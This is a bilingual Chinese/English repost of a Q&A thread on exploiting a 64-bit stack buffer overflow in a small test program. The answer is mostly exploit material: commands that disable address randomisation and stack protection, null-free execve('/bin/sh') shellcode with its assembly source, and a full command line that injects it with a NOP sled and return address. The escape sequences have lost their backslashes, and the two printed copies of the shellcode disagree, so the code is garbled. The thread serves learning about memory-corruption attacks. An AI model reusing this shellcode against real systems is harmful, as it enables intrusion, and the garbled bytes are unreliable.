64 位缓冲区溢出 [英] Buffer overflows on 64 bit
问题描述
为了好玩,我正在尝试做一些缓冲区溢出的实验.我正在这个论坛上阅读有关该主题的内容,并尝试编写自己的小代码.
I am trying to do some experiments with buffer overflows for fun. I was reading on this forum on the topic, and tried to write my own little code.
所以我做的是一个小的C"程序,它接受字符参数并运行直到分段错误.
So what I did is a small "C" program, which takes character argument and runs until segmentation fault.
所以我提供参数,直到我收到一条消息,我用A"覆盖了返回地址,即 41.我的缓冲区字符长度,在其中复制我的输入字符串是 [5].
So I supply arguments until I get a message that I overwrote the return address with "A" which is 41. My buffer character length, in which I copy my input strings is [5].
这是我在 gdb 中所做的.
Here is what I did in gdb.
run $(perl -e 'print "A"x32 ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d
然后我发现覆盖需要 16 个A".
Then I figured out that it takes 16 'A' to overwrite.
run $(perl -e 'print "A"x16 . "C"x8 . "B"x32 ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
)
这告诉我们 8 个C"正在覆盖返回地址.
Which tells us that the 8 "C" are overwriting the return address.
根据在线教程,如果我提供有效地址而不是 8 个C".我可以跳到某个地方并执行代码.所以我在最初的16个A"之后重载了内存.
According to the online tutorials if I supply a valid adress instead of the 8 "C". I can jump to some place and execute code. So I overloaded the memory after the initial 16 "A".
下一步是执行
run $(perl -e 'print "A"x16 . "C"x8 . "B"x200 ; ')
rax 0x0 0
rbx 0x3a0001bbc0 249108216768
rcx 0x3a00552780 249113683840
rdx 0x3a00553980 249113688448
rsi 0x42 66
rdi 0x2af9e57710e0 47252785008864
rbp 0x4343434343434343 0x4343434343434343
rsp 0x7fffb261a2e8 0x7fffb261a2e8
r8 0xffffffff 4294967295
r9 0x0 0
r10 0x22 34
r11 0xffffffff 4294967295
r12 0x0 0
r13 0x7fffb261a3c0 140736186131392
r14 0x0 0
r15 0x0 0
rip 0x400516 0x400516 <main+62>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
在 $rsp 之后检查内存 200 字节后,我找到了一个地址,并执行了以下操作:
After examining the memory 200 bytes after $rsp i found an address and I did the following:
run $(perl -e 'print "A"x16 . "x38xd0xcbx9bxffx7f" . "x90"x50 . "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80" ; ')
然而这并没有做任何事情.如果有人能告诉我我做错了什么,我将不胜感激.
This however does not do anything. I would be grateful if someone can give me an idea what am I doing wrong.
推荐答案
首先确保您更改了 randomize_va_space.在 Ubuntu 上,您将以 root 身份运行以下命令echo 0 >/proc/sys/kernel/randomize_va_space
First make sure that you change the randomize_va_space. On Ubuntu you would run the following as root
echo 0 > /proc/sys/kernel/randomize_va_space
接下来确保您在编译没有堆栈粉碎保护的测试程序并设置内存执行位.使用以下 gcc 选项编译它以完成-fno-stack-protector -z execstack
Next make sure you are compiling the test program without stack smashing protection and set the memory execution bit. Compile it with the following gcc options to accomplish
-fno-stack-protector -z execstack
此外,我发现我需要更多空间来实际执行 shell,因此我会将您的缓冲区更改为更像缓冲区 [64]
Also I found I needed more space to actually execute a shell so I would change your buffer to something more like buffer[64]
接下来可以在gdb中运行app,获取需要返回的栈地址
先在strcpy之后设置断点
Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040057c <+0>: push %rbp
0x000000000040057d <+1>: mov %rsp,%rbp
0x0000000000400580 <+4>: sub $0x50,%rsp
0x0000000000400584 <+8>: mov %edi,-0x44(%rbp)
0x0000000000400587 <+11>: mov %rsi,-0x50(%rbp)
0x000000000040058b <+15>: mov -0x50(%rbp),%rax
0x000000000040058f <+19>: add $0x8,%rax
0x0000000000400593 <+23>: mov (%rax),%rdx
0x0000000000400596 <+26>: lea -0x40(%rbp),%rax
0x000000000040059a <+30>: mov %rdx,%rsi
0x000000000040059d <+33>: mov %rax,%rdi
0x00000000004005a0 <+36>: callq 0x400450 <strcpy@plt>
0x0000000000**4005a5** <+41>: lea -0x40(%rbp),%rax
0x00000000004005a9 <+45>: mov %rax,%rsi
0x00000000004005ac <+48>: mov $0x400674,%edi
0x00000000004005b1 <+53>: mov $0x0,%eax
0x00000000004005b6 <+58>: callq 0x400460 <printf@plt>
0x00000000004005bb <+63>: mov $0x0,%eax
0x00000000004005c0 <+68>: leaveq
0x00000000004005c1 <+69>: retq
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5
然后运行应用程序并在断点处获取 rax 寄存器地址.
Then run the app and at the break point grab the rax register address.
(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`
Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax 0x7fffffffe030 140737488347136
rbx 0x0 0
rcx 0x4141414141414141 4702111234474983745
rdx 0x41 65
rsi 0x7fffffffe490 140737488348304
rdi 0x7fffffffe077 140737488347255
rbp 0x7fffffffe040 0x7fffffffe040
rsp 0x7fffffffdff0 0x7fffffffdff0
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7de9d60 140737351949664
r10 0x7fffffffdd90 140737488346512
r11 0x7ffff7b8fd60 140737349483872
r12 0x400490 4195472
r13 0x7fffffffe120 140737488347424
r14 0x0 0
r15 0x0 0
rip 0x4005a5 0x4005a5 <main+41>
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
接下来确定您的最大缓冲区大小.我知道 64 的缓冲区在 72 字节时崩溃,所以我会从那个开始......你可以使用类似 metasploits 模式的方法来给你这个,或者只是通过运行应用程序的反复试验来找出确切的字节在出现段错误之前计算它需要的时间,或者创建自己的模式并像使用 metasploit 模式选项一样匹配 rip 地址.
Next determine your max buffer size. I know that the buffer of 64 crashes at 72 bytes so I will just go from that.. You could use something like metasploits pattern methods to give you this or just figure it out from trial and error running the app to find out the exact byte count it takes before getting a segfault or make up a pattern of your own and match the rip address like you would with the metasploit pattern option.
接下来,有许多不同的方法可以获取您需要的有效负载,但由于我们运行的是 64 位应用程序,因此我们将使用 64 位有效负载.我编译了 C,然后从 gdb 中获取了 ASM,然后通过将 mov 指令更改为 xor 来删除空值,然后通过 shl 和 shr 将它们从 shell 命令中删除,从而进行了一些更改以删除 x00 字符.我们稍后会展示这一点,但目前有效载荷如下.
Next, there are many different ways to get the payload you need but since we are running a 64bit app, we will use a 64bit payload. I compiled C and then grabbed the ASM from gdb and then made some changes to remove the x00 chars by changing the mov instructions to xor for the null values and then shl and shr to remove them from the shell command. We will show this later but for now the payload is as follows.
<代码>x48x31xd2x48x89xd6x48xbfx2fx62x69x6ex2fx73x68x11x48xc1xe7x08x48xc1xefx08x57x48x89xe7x48xb8x3bx11x11x11x11x11x11x11x48xc1xe0x38x48xc1xe8x38xfx05
我们这里的有效载荷是 48 个字节,所以我们有 72 - 48 = 24
our payload here is 48 bytes so we have 72 - 48 = 24
我们可以用 x90 (nop) 填充有效载荷,这样指令就不会被中断.我将在有效载荷的末尾添加 2,在开头添加 22.此外,我将添加我们想要反向结束的返回地址,给出以下内容..
We can pad the payload with x90 (nop) so that instruction will not be interrupted. Ill add 2 at the end of the payload and 22 at the beginning. Also I will tack on the return address that we want to the end in reverse giving the following..
`python -c 'print "x90"*22+"x48x31xd2x48x89xd6x48xbfx2fx62x69x6ex2fx73x68x11x48xc1xe7x08x48xc1xefx08x57x48x89xe7x48xb8x3bx11x11x11x11x11x11x11x48xc1xe0x38x48xc1xe8x38x0fx05x90x90x30xe0xffxffxffx7f"';`
现在,如果你想在 gdb 之外运行它,你可能不得不捏造返回地址.在我的情况下,地址变为 gdb 之外的 x70xe0xffxffxffx7f.我只是增加了它,直到它工作到 40 然后 50 然后 60 然后 70..
Now if you want to run it outside of gdb, you may have to fudge with the return address. In my case the address becomes x70xe0xffxffxffx7f outside of gdb. I just increased it until it worked by going to 40 then 50 then 60 then 70..
测试应用源
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char name[64];
strcpy(name, argv[1]);
printf("Arg[1] is :%s
", name);
return 0;
}
这是C中的payload
This is the payload in C
#include <stdlib.h>
int main()
{
execve("/bin/sh", NULL, NULL);
}
以及将构建和运行的 ASM 中的有效载荷
And payload in ASM which will build and run
int main() {
__asm__(
"mov $0x0,%rdx
" // arg 3 = NULL
"mov $0x0,%rsi
" // arg 2 = NULL
"mov $0x0068732f6e69622f,%rdi
"
"push %rdi
" // push "/bin/sh" onto stack
"mov %rsp,%rdi
" // arg 1 = stack pointer = start of /bin/sh
"mov $0x3b,%rax
" // syscall number = 59
"syscall
"
);
}
而且由于我们不能使用 x00,我们可以更改为 xor 值并进行一些花哨的转换以删除 mov 的错误值以设置/bin/sh
And since we can't use x00 we can change to xor the values and do some fancy shifting to remove the bad values of the mov for setting up /bin/sh
int main() {
__asm__(
"xor %rdx,%rdx
" // arg 3 = NULL
"mov %rdx,%rsi
" // arg 2 = NULL
"mov $0x1168732f6e69622f,%rdi
"
"shl $0x8,%rdi
"
"shr $0x8,%rdi
" // first byte = 0 (8 bits)
"push %rdi
" // push "/bin/sh" onto stack
"mov %rsp,%rdi
" // arg 1 = stack ptr = start of /bin/sh
"mov $0x111111111111113b,%rax
" // syscall number = 59
"shl $0x38,%rax
"
"shr $0x38,%rax
" // first 7 bytes = 0 (56 bits)
"syscall
"
);
}
如果你编译那个payload,在gdb下运行它,你可以得到你需要的字节值,比如
if you compile that payload, run it under gdb you can get the byte values you need such as
(gdb) x/bx main+4
0x400478 <main+4>: 0x48
(gdb)
0x400479 <main+5>: 0x31
(gdb)
0x40047a <main+6>: 0xd2
(gdb)
或者通过做类似的事情来获得一切
or get it all by doing something like
(gdb) x/48bx main+4
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05
这篇关于64 位缓冲区溢出的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!